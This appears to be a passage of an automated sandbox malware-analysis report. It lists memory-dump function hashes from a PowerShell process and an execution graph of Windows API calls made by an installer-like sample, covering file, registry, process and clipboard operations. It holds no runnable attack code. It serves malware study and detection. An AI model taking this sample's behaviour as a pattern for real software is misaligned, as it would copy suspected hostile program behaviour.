                                                                                                                                                                                                                                                                                              Function 00007FF848E93985 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2203708287.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff848e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                              • Opcode ID: 3dd856ec6629a9ad3253283359d6c2a881ec7a1311ff8ffeb1e483423fcff176
                                                                                                                                                                                                                                                                                              • Instruction ID: 2bb52e8627466be6ec14451373b6e77a703286f4f7d648d8cd704c74c5a6527f
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3dd856ec6629a9ad3253283359d6c2a881ec7a1311ff8ffeb1e483423fcff176
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E01677111CB0C4FDB44EF0CE451AA6B7E0FB99364F50056DE58AC3665D736E881CB45
                                                                                                                                                                                                                                                                                              Function 00007FF848E9ECA1 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2203708287.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff848e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                              • Opcode ID: 531c324d27096743726cf3a12913b0f000eaa42287d62a8bbb528f59560420cc
                                                                                                                                                                                                                                                                                              • Instruction ID: 9b3e2f00fe31902e67502cf3f13a12645102d62e169e04678f63cd108594a98f
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 531c324d27096743726cf3a12913b0f000eaa42287d62a8bbb528f59560420cc
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A6F0F651E1EAC65FE345B36C64292A43BA1FB89380F1D40F6C148CB2C3CE1C5C0A43A6

                                                                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                                                                              Execution Coverage:18.6%
                                                                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                              Signature Coverage:20.7%
                                                                                                                                                                                                                                                                                              Total number of Nodes:1525
                                                                                                                                                                                                                                                                                              Total number of Limit Nodes:33
                                                                                                                                                                                                                                                                                              execution_graph 4341 402fc0 4342 401446 18 API calls 4341->4342 4343 402fc7 4342->4343 4344 403017 4343->4344 4345 40300a 4343->4345 4348 401a13 4343->4348 4346 406805 18 API calls 4344->4346 4347 401446 18 API calls 4345->4347 4346->4348 4347->4348 4349 4023c1 4350 40145c 18 API calls 4349->4350 4351 4023c8 4350->4351 4354 40726a 4351->4354 4357 406ed2 CreateFileW 4354->4357 4358 406f04 4357->4358 4359 406f1e ReadFile 4357->4359 4360 4062a3 11 API calls 4358->4360 4361 4023d6 4359->4361 4364 406f84 4359->4364 4360->4361 4362 4071e3 CloseHandle 4362->4361 4363 406f9b ReadFile lstrcpynA lstrcmpA 4363->4364 4365 406fe2 SetFilePointer ReadFile 4363->4365 4364->4361 4364->4362 4364->4363 4368 406fdd 4364->4368 4365->4362 4366 4070a8 ReadFile 4365->4366 4367 407138 4366->4367 4367->4366 4367->4368 4369 40715f SetFilePointer GlobalAlloc ReadFile 4367->4369 4368->4362 4370 4071a3 4369->4370 4371 4071bf lstrcpynW GlobalFree 4369->4371 4370->4370 4370->4371 4371->4362 4372 401cc3 4373 40145c 18 API calls 4372->4373 4374 401cca lstrlenW 4373->4374 4375 4030dc 4374->4375 4376 4030e3 4375->4376 4378 405f51 wsprintfW 4375->4378 4378->4376 4393 401c46 4394 40145c 18 API calls 4393->4394 4395 401c4c 4394->4395 4396 4062a3 11 API calls 4395->4396 4397 401c59 4396->4397 4398 406c9b 81 API calls 4397->4398 4399 401c64 4398->4399 4400 403049 4401 401446 18 API calls 4400->4401 4404 403050 4401->4404 4402 406805 18 API calls 4403 401a13 4402->4403 4404->4402 4404->4403 4405 40204a 4406 401446 18 API calls 4405->4406 4407 402051 IsWindow 4406->4407 4408 4018d3 4407->4408 4409 40324c 4410 403277 4409->4410 4411 40325e SetTimer 4409->4411 4412 4032cc 4410->4412 4413 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4410->4413 4411->4410 4413->4412 4414 4048cc 4415 4048f1 4414->4415 4416 4048da 4414->4416 4418 4048ff IsWindowVisible 4415->4418 4422 404916 4415->4422 4417 4048e0 4416->4417 4432 40495a 4416->4432 4419 403daf SendMessageW 4417->4419 4421 40490c 4418->4421 4418->4432 4423 4048ea 4419->4423 4420 404960 CallWindowProcW 4420->4423 4433 40484e SendMessageW 4421->4433 4422->4420 4438 406009 lstrcpynW 4422->4438 4426 404945 4439 405f51 wsprintfW 4426->4439 4428 40494c 4429 40141d 80 API calls 4428->4429 4430 404953 4429->4430 4440 406009 lstrcpynW 4430->4440 4432->4420 4434 404871 GetMessagePos ScreenToClient SendMessageW 4433->4434 4435 4048ab SendMessageW 4433->4435 4436 4048a3 4434->4436 4437 4048a8 4434->4437 4435->4436 4436->4422 4437->4435 4438->4426 4439->4428 4440->4432 4441 4022cc 4442 40145c 18 API calls 4441->4442 4443 4022d3 4442->4443 4444 4062d5 2 API calls 4443->4444 4445 4022d9 4444->4445 4446 4022e8 4445->4446 4450 405f51 wsprintfW 4445->4450 4449 4030e3 4446->4449 4451 405f51 wsprintfW 4446->4451 4450->4446 4451->4449 4221 4050cd 4222 405295 4221->4222 4223 4050ee GetDlgItem GetDlgItem GetDlgItem 4221->4223 4224 4052c6 4222->4224 4225 40529e GetDlgItem CreateThread CloseHandle 4222->4225 4270 403d98 SendMessageW 4223->4270 4227 4052f4 4224->4227 4229 4052e0 ShowWindow ShowWindow 4224->4229 4230 405316 4224->4230 4225->4224 4273 405047 83 API calls 4225->4273 4231 405352 4227->4231 4233 405305 4227->4233 4234 40532b ShowWindow 4227->4234 4228 405162 4241 406805 18 API calls 4228->4241 4272 403d98 SendMessageW 4229->4272 4235 403dca 8 API calls 4230->4235 4231->4230 4236 40535d SendMessageW 4231->4236 4237 403d18 SendMessageW 4233->4237 4239 40534b 4234->4239 4240 40533d 4234->4240 4238 40528e 4235->4238 4236->4238 4243 405376 CreatePopupMenu 4236->4243 4237->4230 4242 403d18 SendMessageW 4239->4242 4244 404f72 25 API calls 4240->4244 4245 405181 4241->4245 4242->4231 4246 406805 18 API calls 4243->4246 4244->4239 4247 4062a3 11 API calls 4245->4247 4249 405386 AppendMenuW 4246->4249 4248 40518c GetClientRect GetSystemMetrics SendMessageW SendMessageW 4247->4248 4250 4051f3 4248->4250 4251 4051d7 SendMessageW SendMessageW 4248->4251 4252 405399 GetWindowRect 4249->4252 4253 4053ac 4249->4253 4254 405206 4250->4254 4255 4051f8 SendMessageW 4250->4255 4251->4250 4256 4053b3 TrackPopupMenu 4252->4256 4253->4256 4257 403d3f 19 API calls 4254->4257 4255->4254 4256->4238 4258 4053d1 4256->4258 4259 405216 4257->4259 4260 4053ed SendMessageW 4258->4260 4261 405253 GetDlgItem SendMessageW 4259->4261 4262 40521f ShowWindow 4259->4262 4260->4260 4263 40540a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4260->4263 4261->4238 4266 405276 SendMessageW SendMessageW 4261->4266 4264 405242 4262->4264 4265 405235 ShowWindow 4262->4265 4267 40542f SendMessageW 4263->4267 4271 403d98 SendMessageW 4264->4271 4265->4264 4266->4238 4267->4267 4268 40545a GlobalUnlock SetClipboardData CloseClipboard 4267->4268 4268->4238 4270->4228 4271->4261 4272->4227 4452 4030cf 4453 40145c 18 API calls 4452->4453 4454 4030d6 4453->4454 4456 4030dc 4454->4456 4459 4063ac GlobalAlloc lstrlenW 4454->4459 4457 4030e3 4456->4457 4486 405f51 wsprintfW 4456->4486 4460 4063e2 4459->4460 4461 406434 4459->4461 4462 40640f GetVersionExW 4460->4462 4487 40602b CharUpperW 4460->4487 4461->4456 4462->4461 4463 40643e 4462->4463 4464 406464 LoadLibraryA 4463->4464 4465 40644d 4463->4465 4464->4461 4468 406482 GetProcAddress GetProcAddress GetProcAddress 4464->4468 4465->4461 4467 406585 GlobalFree 4465->4467 4469 40659b LoadLibraryA 4467->4469 4470 4066dd FreeLibrary 4467->4470 4473 4064aa 4468->4473 4476 4065f5 4468->4476 4469->4461 4472 4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4469->4472 4470->4461 4471 406651 FreeLibrary 4480 40662a 4471->4480 4472->4476 4474 4064ce FreeLibrary GlobalFree 4473->4474 4473->4476 4482 4064ea 4473->4482 4474->4461 4475 4066ea 4478 4066ef CloseHandle FreeLibrary 4475->4478 4476->4471 4476->4480 4477 4064fc lstrcpyW OpenProcess 4479 40654f CloseHandle CharUpperW lstrcmpW 4477->4479 4477->4482 4481 406704 CloseHandle 4478->4481 4479->4476 4479->4482 4480->4475 4483 406685 lstrcmpW 4480->4483 4484 4066b6 CloseHandle 4480->4484 4485 4066d4 CloseHandle 4480->4485 4481->4478 4482->4467 4482->4477 4482->4479 4483->4480 4483->4481 4484->4480 4485->4470 4486->4457 4487->4460 4488 407752 4492 407344 4488->4492 4489 407c6d 4490 4073c2 GlobalFree 4491 4073cb GlobalAlloc 4490->4491 4491->4489 4491->4492 4492->4489 4492->4490 4492->4491 4492->4492 4493 407443 GlobalAlloc 4492->4493 4494 40743a GlobalFree 4492->4494 4493->4489 4493->4492 4494->4493 4495 401dd3 4496 401446 18 API calls 4495->4496 4497 401dda 4496->4497 4498 401446 18 API calls 4497->4498 4499 4018d3 4498->4499 4507 402e55 4508 40145c 18 API calls 4507->4508 4509 402e63 4508->4509 4510 402e79 4509->4510 4511 40145c 18 API calls 4509->4511 4512 405e30 2 API calls 4510->4512 4511->4510 4513 402e7f 4512->4513 4537 405e50 GetFileAttributesW CreateFileW 4513->4537 4515 402e8c 4516 402f35 4515->4516 4517 402e98 GlobalAlloc 4515->4517 4520 4062a3 11 API calls 4516->4520 4518 402eb1 4517->4518 4519 402f2c CloseHandle 4517->4519 4538 403368 SetFilePointer 4518->4538 4519->4516 4522 402f45 4520->4522 4524 402f50 DeleteFileW 4522->4524 4525 402f63 4522->4525 4523 402eb7 4527 403336 ReadFile 4523->4527 4524->4525 4539 401435 4525->4539 4528 402ec0 GlobalAlloc 4527->4528 4529 402ed0 4528->4529 4530 402f04 WriteFile GlobalFree 4528->4530 4531 40337f 37 API calls 4529->4531 4532 40337f 37 API calls 4530->4532 4536 402edd 4531->4536 4533 402f29 4532->4533 4533->4519 4535 402efb GlobalFree 4535->4530 4536->4535 4537->4515 4538->4523 4540 404f72 25 API calls 4539->4540 4541 401443 4540->4541 4542 401cd5 4543 401446 18 API calls 4542->4543 4544 401cdd 4543->4544 4545 401446 18 API calls 4544->4545 4546 401ce8 4545->4546 4547 40145c 18 API calls 4546->4547 4548 401cf1 4547->4548 4549 401d07 lstrlenW 4548->4549 4550 401d43 4548->4550 4551 401d11 4549->4551 4551->4550 4555 406009 lstrcpynW 4551->4555 4553 401d2c 4553->4550 4554 401d39 lstrlenW 4553->4554 4554->4550 4555->4553 4556 403cd6 4557 403ce1 4556->4557 4558 403ce5 4557->4558 4559 403ce8 GlobalAlloc 4557->4559 4559->4558 4560 402cd7 4561 401446 18 API calls 4560->4561 4564 402c64 4561->4564 4562 402d99 4563 402d17 ReadFile 4563->4564 4564->4560 4564->4562 4564->4563 4565 402dd8 4566 402ddf 4565->4566 4567 4030e3 4565->4567 4568 402de5 FindClose 4566->4568 4568->4567 4569 401d5c 4570 40145c 18 API calls 4569->4570 4571 401d63 4570->4571 4572 40145c 18 API calls 4571->4572 4573 401d6c 4572->4573 4574 401d73 lstrcmpiW 4573->4574 4575 401d86 lstrcmpW 4573->4575 4576 401d79 4574->4576 4575->4576 4577 401c99 4575->4577 4576->4575 4576->4577 4279 407c5f 4280 407344 4279->4280 4281 4073c2 GlobalFree 4280->4281 4282 4073cb GlobalAlloc 4280->4282 4283 407c6d 4280->4283 4284 407443 GlobalAlloc 4280->4284 4285 40743a GlobalFree 4280->4285 4281->4282 4282->4280 4282->4283 4284->4280 4284->4283 4285->4284 4578 404363 4579 404373 4578->4579 4580 40439c 4578->4580 4582 403d3f 19 API calls 4579->4582 4581 403dca 8 API calls 4580->4581 4583 4043a8 4581->4583 4584 404380 SetDlgItemTextW 4582->4584 4584->4580 4585 4027e3 4586 4027e9 4585->4586 4587 4027f2 4586->4587 4588 402836 4586->4588 4601 401553 4587->4601 4589 40145c 18 API calls 4588->4589 4591 40283d 4589->4591 4593 4062a3 11 API calls 4591->4593 4592 4027f9 4594 40145c 18 API calls 4592->4594 4599 401a13 4592->4599 4595 40284d 4593->4595 4596 40280a RegDeleteValueW 4594->4596 4605 40149d RegOpenKeyExW 4595->4605 4597 4062a3 11 API calls 4596->4597 4600 40282a RegCloseKey 4597->4600 4600->4599 4602 401563 4601->4602 4603 40145c 18 API calls 4602->4603 4604 401589 RegOpenKeyExW 4603->4604 4604->4592 4611 401515 4605->4611 4613 4014c9 4605->4613 4606 4014ef RegEnumKeyW 4607 401501 RegCloseKey 4606->4607 4606->4613 4608 4062fc 3 API calls 4607->4608 4610 401511 4608->4610 4609 401526 RegCloseKey 4609->4611 4610->4611 4614 401541 RegDeleteKeyW 4610->4614 4611->4599 4612 40149d 3 API calls 4612->4613 4613->4606 4613->4607 4613->4609 4613->4612 4614->4611 4615 403f64 4616 403f90 4615->4616 4617 403f74 4615->4617 4619 403fc3 4616->4619 4620 403f96 SHGetPathFromIDListW 4616->4620 4626 405c84 GetDlgItemTextW 4617->4626 4622 403fad SendMessageW 4620->4622 4623 403fa6 4620->4623 4621 403f81 SendMessageW 4621->4616 4622->4619 4624 40141d 80 API calls 4623->4624 4624->4622 4626->4621 4627 402ae4 4628 402aeb 4627->4628 4629 4030e3 4627->4629 4630 402af2 CloseHandle 4628->4630 4630->4629 4631 402065 4632 401446 18 API calls 4631->4632 4633 40206d 4632->4633 4634 401446 18 API calls 4633->4634 4635 402076 GetDlgItem 4634->4635 4636 4030dc 4635->4636 4637 4030e3 4636->4637 4639 405f51 wsprintfW 4636->4639 4639->4637 4640 402665 4641 40145c 18 API calls 4640->4641 4642 40266b 4641->4642 4643 40145c 18 API calls 4642->4643 4644 402674 4643->4644 4645 40145c 18 API calls 4644->4645 4646 40267d 4645->4646 4647 4062a3 11 API calls 4646->4647 4648 40268c 4647->4648 4649 4062d5 2 API calls 4648->4649 4650 402695 4649->4650 4651 4026a6 lstrlenW lstrlenW 4650->4651 4652 404f72 25 API calls 4650->4652 4655 4030e3 4650->4655 4653 404f72 25 API calls 4651->4653 4652->4650 4654 4026e8 SHFileOperationW 4653->4654 4654->4650 4654->4655 4663 401c69 4664 40145c 18 API calls 4663->4664 4665 401c70 4664->4665 4666 4062a3 11 API calls 4665->4666 4667 401c80 4666->4667 4668 405ca0 MessageBoxIndirectW 4667->4668 4669 401a13 4668->4669 4677 402f6e 4678 402f72 4677->4678 4679 402fae 4677->4679 4680 4062a3 11 API calls 4678->4680 4681 40145c 18 API calls 4679->4681 4682 402f7d 4680->4682 4687 402f9d 4681->4687 4683 4062a3 11 API calls 4682->4683 4684 402f90 4683->4684 4685 402fa2 4684->4685 4686 402f98 4684->4686 4689 4060e7 9 API calls 4685->4689 4688 403e74 5 API calls 4686->4688 4688->4687 4689->4687 4690 4023f0 4691 402403 4690->4691 4692 4024da 4690->4692 4693 40145c 18 API calls 4691->4693 4694 404f72 25 API calls 4692->4694 4695 40240a 4693->4695 4700 4024f1 4694->4700 4696 40145c 18 API calls 4695->4696 4697 402413 4696->4697 4698 402429 LoadLibraryExW 4697->4698 4699 40241b GetModuleHandleW 4697->4699 4701 40243e 4698->4701 4702 4024ce 4698->4702 4699->4698 4699->4701 4714 406365 GlobalAlloc WideCharToMultiByte 4701->4714 4703 404f72 25 API calls 4702->4703 4703->4692 4705 402449 4706 40248c 4705->4706 4707 40244f 4705->4707 4708 404f72 25 API calls 4706->4708 4710 401435 25 API calls 4707->4710 4712 40245f 4707->4712 4709 402496 4708->4709 4711 4062a3 11 API calls 4709->4711 4710->4712 4711->4712 4712->4700 4713 4024c0 FreeLibrary 4712->4713 4713->4700 4715 406390 GetProcAddress 4714->4715 4716 40639d GlobalFree 4714->4716 4715->4716 4716->4705 4717 402df3 4718 402dfa 4717->4718 4720 4019ec 4717->4720 4719 402e07 FindNextFileW 4718->4719 4719->4720 4721 402e16 4719->4721 4723 406009 lstrcpynW 4721->4723 4723->4720 4076 402175 4077 401446 18 API calls 4076->4077 4078 40217c 4077->4078 4079 401446 18 API calls 4078->4079 4080 402186 4079->4080 4081 4062a3 11 API calls 4080->4081 4085 402197 4080->4085 4081->4085 4082 4021aa EnableWindow 4084 4030e3 4082->4084 4083 40219f ShowWindow 4083->4084 4085->4082 4085->4083 4731 404077 4732 404081 4731->4732 4733 404084 lstrcpynW lstrlenW 4731->4733 4732->4733 4102 405479 4103 405491 4102->4103 4104 4055cd 4102->4104 4103->4104 4105 40549d 4103->4105 4106 40561e 4104->4106 4107 4055de GetDlgItem GetDlgItem 4104->4107 4108 4054a8 SetWindowPos 4105->4108 4109 4054bb 4105->4109 4111 405678 4106->4111 4119 40139d 80 API calls 4106->4119 4110 403d3f 19 API calls 4107->4110 4108->4109 4113 4054c0 ShowWindow 4109->4113 4114 4054d8 4109->4114 4115 405608 SetClassLongW 4110->4115 4112 403daf SendMessageW 4111->4112 4132 4055c8 4111->4132 4142 40568a 4112->4142 4113->4114 4116 4054e0 DestroyWindow 4114->4116 4117 4054fa 4114->4117 4118 40141d 80 API calls 4115->4118 4171 4058dc 4116->4171 4120 405510 4117->4120 4121 4054ff SetWindowLongW 4117->4121 4118->4106 4122 405650 4119->4122 4125 4055b9 4120->4125 4126 40551c GetDlgItem 4120->4126 4121->4132 4122->4111 4127 405654 SendMessageW 4122->4127 4123 40141d 80 API calls 4123->4142 4124 4058de DestroyWindow KiUserCallbackDispatcher 4124->4171 4181 403dca 4125->4181 4130 40554c 4126->4130 4131 40552f SendMessageW IsWindowEnabled 4126->4131 4127->4132 4129 40590d ShowWindow 4129->4132 4134 405559 4130->4134 4135 4055a0 SendMessageW 4130->4135 4136 40556c 4130->4136 4145 405551 4130->4145 4131->4130 4131->4132 4133 406805 18 API calls 4133->4142 4134->4135 4134->4145 4135->4125 4139 405574 4136->4139 4140 405589 4136->4140 4138 403d3f 19 API calls 4138->4142 4143 40141d 80 API calls 4139->4143 4144 40141d 80 API calls 4140->4144 4141 405587 4141->4125 4142->4123 4142->4124 4142->4132 4142->4133 4142->4138 4162 40581e DestroyWindow 4142->4162 4172 403d3f 4142->4172 4143->4145 4146 405590 4144->4146 4178 403d18 4145->4178 4146->4125 4146->4145 4148 405705 GetDlgItem 4149 405723 ShowWindow KiUserCallbackDispatcher 4148->4149 4150 40571a 4148->4150 4175 403d85 KiUserCallbackDispatcher 4149->4175 4150->4149 4152 40574d EnableWindow 4155 405761 4152->4155 4153 405766 GetSystemMenu EnableMenuItem SendMessageW 4154 405796 SendMessageW 4153->4154 4153->4155 4154->4155 4155->4153 4176 403d98 SendMessageW 4155->4176 4177 406009 lstrcpynW 4155->4177 4158 4057c4 lstrlenW 4159 406805 18 API calls 4158->4159 4160 4057da SetWindowTextW 4159->4160 4161 40139d 80 API calls 4160->4161 4161->4142 4163 405838 CreateDialogParamW 4162->4163 4162->4171 4164 40586b 4163->4164 4163->4171 4165 403d3f 19 API calls 4164->4165 4166 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4165->4166 4167 40139d 80 API calls 4166->4167 4168 4058bc 4167->4168 4168->4132 4169 4058c4 ShowWindow 4168->4169 4170 403daf SendMessageW 4169->4170 4170->4171 4171->4129 4171->4132 4173 406805 18 API calls 4172->4173 4174 403d4a SetDlgItemTextW 4173->4174 4174->4148 4175->4152 4176->4155 4177->4158 4179 403d25 SendMessageW 4178->4179 4180 403d1f 4178->4180 4179->4141 4180->4179 4182 403ddf GetWindowLongW 4181->4182 4192 403e68 4181->4192 4183 403df0 4182->4183 4182->4192 4184 403e02 4183->4184 4185 403dff GetSysColor 4183->4185 4186 403e12 SetBkMode 4184->4186 4187 403e08 SetTextColor 4184->4187 4185->4184 4188 403e30 4186->4188 4189 403e2a GetSysColor 4186->4189 4187->4186 4190 403e41 4188->4190 4191 403e37 SetBkColor 4188->4191 4189->4188 4190->4192 4193 403e54 DeleteObject 4190->4193 4194 403e5b CreateBrushIndirect 4190->4194 4191->4190 4192->4132 4193->4194 4194->4192 4734 4020f9 GetDC GetDeviceCaps 4735 401446 18 API calls 4734->4735 4736 402116 MulDiv 4735->4736 4737 401446 18 API calls 4736->4737 4738 40212c 4737->4738 4739 406805 18 API calls 4738->4739 4740 402165 CreateFontIndirectW 4739->4740 4741 4030dc 4740->4741 4742 4030e3 4741->4742 4744 405f51 wsprintfW 4741->4744 4744->4742 4745 4024fb 4746 40145c 18 API calls 4745->4746 4747 402502 4746->4747 4748 40145c 18 API calls 4747->4748 4749 40250c 4748->4749 4750 40145c 18 API calls 4749->4750 4751 402515 4750->4751 4752 40145c 18 API calls 4751->4752 4753 40251f 4752->4753 4754 40145c 18 API calls 4753->4754 4755 402529 4754->4755 4756 40253d 4755->4756 4757 40145c 18 API calls 4755->4757 4758 4062a3 11 API calls 4756->4758 4757->4756 4759 40256a CoCreateInstance 4758->4759 4760 40258c 4759->4760 4761 40497c GetDlgItem GetDlgItem 4762 4049d2 7 API calls 4761->4762 4767 404bea 4761->4767 4763 404a76 DeleteObject 4762->4763 4764 404a6a SendMessageW 4762->4764 4765 404a81 4763->4765 4764->4763 4768 404ab8 4765->4768 4770 406805 18 API calls 4765->4770 4766 404ccf 4769 404d74 4766->4769 4774 404bdd 4766->4774 4779 404d1e SendMessageW 4766->4779 4767->4766 4777 40484e 5 API calls 4767->4777 4790 404c5a 4767->4790 4773 403d3f 19 API calls 4768->4773 4771 404d89 4769->4771 4772 404d7d SendMessageW 4769->4772 4776 404a9a SendMessageW SendMessageW 4770->4776 4781 404da2 4771->4781 4782 404d9b ImageList_Destroy 4771->4782 4792 404db2 4771->4792 4772->4771 4778 404acc 4773->4778 4780 403dca 8 API calls 4774->4780 4775 404cc1 SendMessageW 4775->4766 4776->4765 4777->4790 4783 403d3f 19 API calls 4778->4783 4779->4774 4785 404d33 SendMessageW 4779->4785 4786 404f6b 4780->4786 4787 404dab GlobalFree 4781->4787 4781->4792 4782->4781 4788 404add 4783->4788 4784 404f1c 4784->4774 4793 404f31 ShowWindow GetDlgItem ShowWindow 4784->4793 4789 404d46 4785->4789 4787->4792 4791 404baa GetWindowLongW SetWindowLongW 4788->4791 4800 404ba4 4788->4800 4803 404b39 SendMessageW 4788->4803 4804 404b67 SendMessageW 4788->4804 4805 404b7b SendMessageW 4788->4805 4799 404d57 SendMessageW 4789->4799 4790->4766 4790->4775 4794 404bc4 4791->4794 4792->4784 4795 404de4 4792->4795 4798 40141d 80 API calls 4792->4798 4793->4774 4796 404be2 4794->4796 4797 404bca ShowWindow 4794->4797 4808 404e12 SendMessageW 4795->4808 4811 404e28 4795->4811 4813 403d98 SendMessageW 4796->4813 4812 403d98 SendMessageW 4797->4812 4798->4795 4799->4769 4800->4791 4800->4794 4803->4788 4804->4788 4805->4788 4806 404ef3 InvalidateRect 4806->4784 4807 404f09 4806->4807 4814 4043ad 4807->4814 4808->4811 4810 404ea1 SendMessageW SendMessageW 4810->4811 4811->4806 4811->4810 4812->4774 4813->4767 4815 4043cd 4814->4815 4816 406805 18 API calls 4815->4816 4817 40440d 4816->4817 4818 406805 18 API calls 4817->4818 4819 404418 4818->4819 4820 406805 18 API calls 4819->4820 4821 404428 lstrlenW wsprintfW SetDlgItemTextW 4820->4821 4821->4784 4822 4026fc 4823 401ee4 4822->4823 4825 402708 4822->4825 4823->4822 4824 406805 18 API calls 4823->4824 4824->4823 4274 4019fd 4275 40145c 18 API calls 4274->4275 4276 401a04 4275->4276 4277 405e7f 2 API calls 4276->4277 4278 401a0b 4277->4278 4826 4022fd 4827 40145c 18 API calls 4826->4827 4828 402304 GetFileVersionInfoSizeW 4827->4828 4829 40232b GlobalAlloc 4828->4829 4833 4030e3 4828->4833 4830 40233f GetFileVersionInfoW 4829->4830 4829->4833 4831 402350 VerQueryValueW 4830->4831 4832 402381 GlobalFree 4830->4832 4831->4832 4835 402369 4831->4835 4832->4833 4839 405f51 wsprintfW 4835->4839 4837 402375 4840 405f51 wsprintfW 4837->4840 4839->4837 4840->4832 4841 402afd 4842 40145c 18 API calls 4841->4842 4843 402b04 4842->4843 4848 405e50 GetFileAttributesW CreateFileW 4843->4848 4845 402b10 4846 4030e3 4845->4846 4849 405f51 wsprintfW 4845->4849 4848->4845 4849->4846 4850 4029ff 4851 401553 19 API calls 4850->4851 4852 402a09 4851->4852 4853 40145c 18 API calls 4852->4853 4854 402a12 4853->4854 4855 402a1f RegQueryValueExW 4854->4855 4857 401a13 4854->4857 4856 402a3f 4855->4856 4860 402a45 4855->4860 4856->4860 4861 405f51 wsprintfW 4856->4861 4859 4029e4 RegCloseKey 4859->4857 4860->4857 4860->4859 4861->4860 4862 401000 4863 401037 BeginPaint GetClientRect 4862->4863 4864 40100c DefWindowProcW 4862->4864 4866 4010fc 4863->4866 4867 401182 4864->4867 4868 401073 CreateBrushIndirect FillRect DeleteObject 4866->4868 4869 401105 4866->4869 4868->4866 4870 401170 EndPaint 4869->4870 4871 40110b CreateFontIndirectW 4869->4871 4870->4867 4871->4870 4872 40111b 6 API calls 4871->4872 4872->4870 4873 401f80 4874 401446 18 API calls 4873->4874 4875 401f88 4874->4875 4876 401446 18 API calls 4875->4876 4877 401f93 4876->4877 4878 401fa3 4877->4878 4879 40145c 18 API calls 4877->4879 4880 401fb3 4878->4880 4881 40145c 18 API calls 4878->4881 4879->4878 4882 402006 4880->4882 4883 401fbc 4880->4883 4881->4880 4885 40145c 18 API calls 4882->4885 4884 401446 18 API calls 4883->4884 4887 401fc4 4884->4887 4886 40200d 4885->4886 4888 40145c 18 API calls 4886->4888 4889 401446 18 API calls 4887->4889 4890 402016 FindWindowExW 4888->4890 4891 401fce 4889->4891 4895 402036 4890->4895 4892 401ff6 SendMessageW 4891->4892 4893 401fd8 SendMessageTimeoutW 4891->4893 4892->4895 4893->4895 4894 4030e3 4895->4894 4897 405f51 wsprintfW 4895->4897 4897->4894 4898 402880 4899 402884 4898->4899 4900 40145c 18 API calls 4899->4900 4901 4028a7 4900->4901 4902 40145c 18 API calls 4901->4902 4903 4028b1 4902->4903 4904 4028ba RegCreateKeyExW 4903->4904 4905 4028e8 4904->4905 4912 4029ef 4904->4912 4906 402934 4905->4906 4907 40145c 18 API calls 4905->4907 4908 402963 4906->4908 4911 401446 18 API calls 4906->4911 4910 4028fc lstrlenW 4907->4910 4909 4029ae RegSetValueExW 4908->4909 4913 40337f 37 API calls 4908->4913 4916 4029c6 RegCloseKey 4909->4916 4917 4029cb 4909->4917 4914 402918 4910->4914 4915 40292a 4910->4915 4918 402947 4911->4918 4919 40297b 4913->4919 4920 4062a3 11 API calls 4914->4920 4921 4062a3 11 API calls 4915->4921 4916->4912 4922 4062a3 11 API calls 4917->4922 4923 4062a3 11 API calls 4918->4923 4929 406224 4919->4929 4925 402922 4920->4925 4921->4906 4922->4916 4923->4908 4925->4909 4928 4062a3 11 API calls 4928->4925 4930 406247 4929->4930 4931 40628a 4930->4931 4932 40625c wsprintfW 4930->4932 4933 402991 4931->4933 4934 406293 lstrcatW 4931->4934 4932->4931 4932->4932 4933->4928 4934->4933 4935 402082 4936 401446 18 API calls 4935->4936 4937 402093 SetWindowLongW 4936->4937 4938 4030e3 4937->4938 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3639 403859 3483->3639 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3490 403ac1 3667 4060e7 3490->3667 3491 403ae1 3646 405ca0 3491->3646 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3650 406009 lstrcpynW 3493->3650 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 